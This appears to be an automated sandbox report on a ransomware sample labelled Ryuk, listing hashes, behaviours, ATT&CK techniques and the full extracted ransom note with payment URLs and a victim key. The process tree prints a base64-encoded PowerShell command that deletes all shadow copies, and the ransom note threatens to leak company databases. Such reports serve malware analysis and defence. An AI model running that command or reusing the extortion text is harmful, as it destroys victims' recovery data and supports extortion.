Analysis

  • max time kernel
    136s
  • max time network
    165s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 00:38

General

  • Target

    fedc73b81adb7a73d8bec23d36b17a8024bcb3ef240628062634f1c26abbb87e.exe

  • Size

    164KB

  • MD5

    02abb3bcf740b5f2e3c244dd9a3169d7

  • SHA1

    eab30869f6e27b24ceacb906371a7916aa0efef1

  • SHA256

    fedc73b81adb7a73d8bec23d36b17a8024bcb3ef240628062634f1c26abbb87e

  • SHA512

    17406e3ae23b1e21411ffb9b3a0e8e01c50dc762b5fc3e42571ce748e7bbb3f20c7f9c404bc2a264e5713c7bedddad9acdb5eb24605a2c97fe522a93e8be8306

Score
10/10

Malware Config

Extracted

Path

C:\a67dn-readme.txt

Family

ryuk

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension a67dn. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. I suggest you read about us on the Internet, we are known as "Sodinokibi Ransomware". For example, this article: https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spread Pay attention to that: "How Much Data Is Decrypted with a Ransomware Decryptor? In Q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. This statistic varied dramatically depending on the ransomware type. For example, Ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while Sodinokibi was close to 100%. " Now you have a guarantee that your files will be returned 100 %. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/4895E33DFE2A8572 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/4895E33DFE2A8572 Warning: secondary website can be blocked, thats why first variant much better and more available. If you have problem with connect, use strictly TOR version 8.5.5 link for download TOR version 8.5.5 here: https://filehippo.com/download_tor_browser_for_windows/ When you open our website, put the following data in the input form: Key: 8Ji1XBCuufK6Xquspxnxm8l990+Ll4w1eEKQUvs+KT9ef9454CX7GQiegifOh0yD CdSTXP+YRUlEb4dCmKltOSwgrnNtW/lAULIqi1g0oSMhW5u98CF0zhaT4uonc+HP FBzbqLNBwfLaRqkX4/APW3iudgpaeoJrHFqohyJ3vDM/Ut/KY4z32pWWtRCXciy+ NharEDMyDZ4+KJoppZ0Ag4BAEY6S4AWBz6qrosPbOCI5rQ8TV+pleXp3A+vyogwB TzwBvqrgRoKo3VhO0jOsYXhUYdc1+vNbCSQwmu+2Q/W6DJh1dwhqTLyDFcW8GrnF G7IFwx7cITRM0antEq/6P60cuNVi8SlErzmOQkTYJuQB2Cbt+v9RF+Se4ofx3vKv rM5CE0BPzyHcv08S3xBu7LHDN/xF/EsAQ0CS27kquiTEFVcnW99WwEsY8pOjx1w2 BrYfu0X17ClnGyjHTfW2Z/GF6M3SDyJlPsKfLAbqy6vxhGiZ5wUuJaUHrtRanwT3 iGMyn1kP4MO017ZN1OzdGS9zuBuJripdDxa0zllOM1UM3TlEQytxT7EqXvC6DwlM vKpsPCOojgGP3VWjKz9pMJ85pg4jv9XnBUyRk10SP6ykCcY3xyJV7MGuRwFql9lo wroDvDYW6dLXAKAtGhf8udtHNoG0MPe0eijNh3w1k+x0kMJkQVBEi4kgAWdB04EL lF88hDKFxwCkme8zaGUc52I4A/MEmOxwnSsF0Jr/MZNcAd3lam767tjudc4VNX4r gC7ZrwoTw47/AA4xQizMLsg9zv8U5P/g5ibhkw3oE4SWM1l8HwJa3hL71B2vK33T tvHS5ZGucsPF/SDVbnS0XrDmyArtUu6DqjaZhViGsDVFR4arERvA34Rd4Y3Al23B Wo0oUCD4j1bJtYIa8ag/VFULYRVECPnOL2AiXmH4k3Lq3GDH3aGXnycinl6EZbrf r5uFrG6k6nOMOR44hZYW1vqOsfBO8zZqHBrqhLcwGL5JZ3ktLjA38l5gv/3f3tyx 0TiMdsS2QKhmqEZbyEBNuy1sh8tFKdqe2hpHUYU8mNqNggRYhcXQPfEQHWQ8YQYM 1qm/6r7k55E9fvk+k748cdKcoLAmqv0jzNzpgyZj+oWLPcmjtZQ9wWKyaAjGSiXZ c9Y= Extension name: a67dn ----------------------------------------------------------------------------------------- postscript: In case you want to independently decrypt your servers, we will be forced to put the databases of your companies in the public domain. MDF files: DB_UTILITY LeasePlus LPSecurity LTShared PaperVision !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spread

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/4895E33DFE2A8572

http://decryptor.top/4895E33DFE2A8572

https://filehippo.com/download_tor_browser_for_windows/

Signatures

  • Ryuk

    Ransomware distributed via existing botnets, often Trickbot or Emotet.

  • Modifies extensions of user files 14 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 39 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fedc73b81adb7a73d8bec23d36b17a8024bcb3ef240628062634f1c26abbb87e.exe
    "C:\Users\Admin\AppData\Local\Temp\fedc73b81adb7a73d8bec23d36b17a8024bcb3ef240628062634f1c26abbb87e.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:540
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1916
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:568
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1996

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    2
    T1112

    Install Root Certificate

    1
    T1130

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/540-54-0x0000000076041000-0x0000000076043000-memory.dmp
      Filesize

      8KB

    • memory/1916-55-0x000007FEFB8C1000-0x000007FEFB8C3000-memory.dmp
      Filesize

      8KB

    • memory/1916-57-0x00000000028C0000-0x00000000028C2000-memory.dmp
      Filesize

      8KB

    • memory/1916-58-0x00000000028C2000-0x00000000028C4000-memory.dmp
      Filesize

      8KB

    • memory/1916-59-0x00000000028C4000-0x00000000028C7000-memory.dmp
      Filesize

      12KB

    • memory/1916-56-0x000007FEF2B40000-0x000007FEF369D000-memory.dmp
      Filesize

      11.4MB

    • memory/1916-60-0x00000000028CB000-0x00000000028EA000-memory.dmp
      Filesize

      124KB